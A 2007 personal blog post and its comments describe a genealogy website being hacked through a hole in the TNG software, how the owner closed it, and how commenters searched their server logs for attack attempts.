My non-blogging site, rjmaguire.com, that mainly hosts my genealogy stuff, was hacked recently. The perp found an underground published security hole in the 3rd party genealogy software I use called TNG: The Next Generation. I found a message on their support forums that describes how to close the hole and now it has. I’ve also replaced the damaged file (as they at least were kind enough to only do a minimal amount of damage).
I don’t blame the author of the software or the PHP programming language. It was an easy mistake to make. I still intend on using the software (and upgrade to the newest version even). It was my own fault for not keeping a closer eye on the server logs and on the TNG mailing list to notice that this kind of thing was going on.
I haven’t actually been able to pinpoint the exact day or time when the hack occurred. The first attempts began in mid-March. I don’t think the hack actually occurred until just a few days ago, when I noticed the page on my site was posted in a Spanish-language forum as a badge of honour as it were. Thankfully, the kids trying this stuff out aren’t really that bright, as witnessed by a lot of failures to even copy and paste correctly.
One of them actually managed to copy a couple of executables that looked like IRC server software or something, but was undoubtedly stopped cold when it had no chance of running on my server’s architecture.
These are the IPs of the machines from which these kiddies attempted their hacks, followed by the URLs where they hosted their payloads:
Update (18 Jul 2007): I’ve created a quick and dirty live feed of hack attempts and the external links from where the attack scripts are being hosted, seeing as I’m still getting the odd attempt now and then…
Update (15 Sep 2007): List removed since it’s grossly out of date.
8 Comments
Bob, sorry to hear about the hack. How exactly did you notice that site was posted in a Spanish-language forum? Do you Google your site on a regular basis?
Someone clicked on the link and visited my site to see the evidence, so it ended up in my logs as a referer link.
I saw attempts for this as well and decided to comb my logs for more occurences. I hacked out this ugly multi-part awk monstrosity to dump the results from the various logs to a file:
cat /var/log/default.access.log | awk ‘{print $1,” – “,$4,” – “,$12,” – “,$7}’ | awk ‘/.*\?$/’ > attackers-wiki.txt
I’m sure someone with greater awk skillz can make it nicer…
One interesting thing I noticed was that one of the files they try to run attempts to disable the safe-mode option in PHP.
[...] Several people have encountered the same and have been successfully hacked. The script is uploaded somewhere else and being pulled up from the target site. Your error logs might display this as such: [...]
I have visited your site 368-times
What a coincidence. I have visited yours 0 times.
FYI – there are sites and ip’s included in your mega list that were hacked also and then used unknowingly for brief periods until the owners/administrators were able to shut down the exploits in the same or similar ways that you were able to do. Only now when those domains are searched they get your blog that associates them with hacking exploits… not great. In other words someone else could have done a similar list with your domain on it because of the hack on your site. My point is that publishing these lists without fully understanding what you are publishing (pardon me if you do) results in potential damage to others who suffered the exact same assault that you did. I would like you to consider removing the list as I’m sure I am not the only one. Thanks. GZ
Sure. No problem. There’s been a considerable passage of time since then anyway.
Comments RSS feed.
TrackBack URI
Leave a comment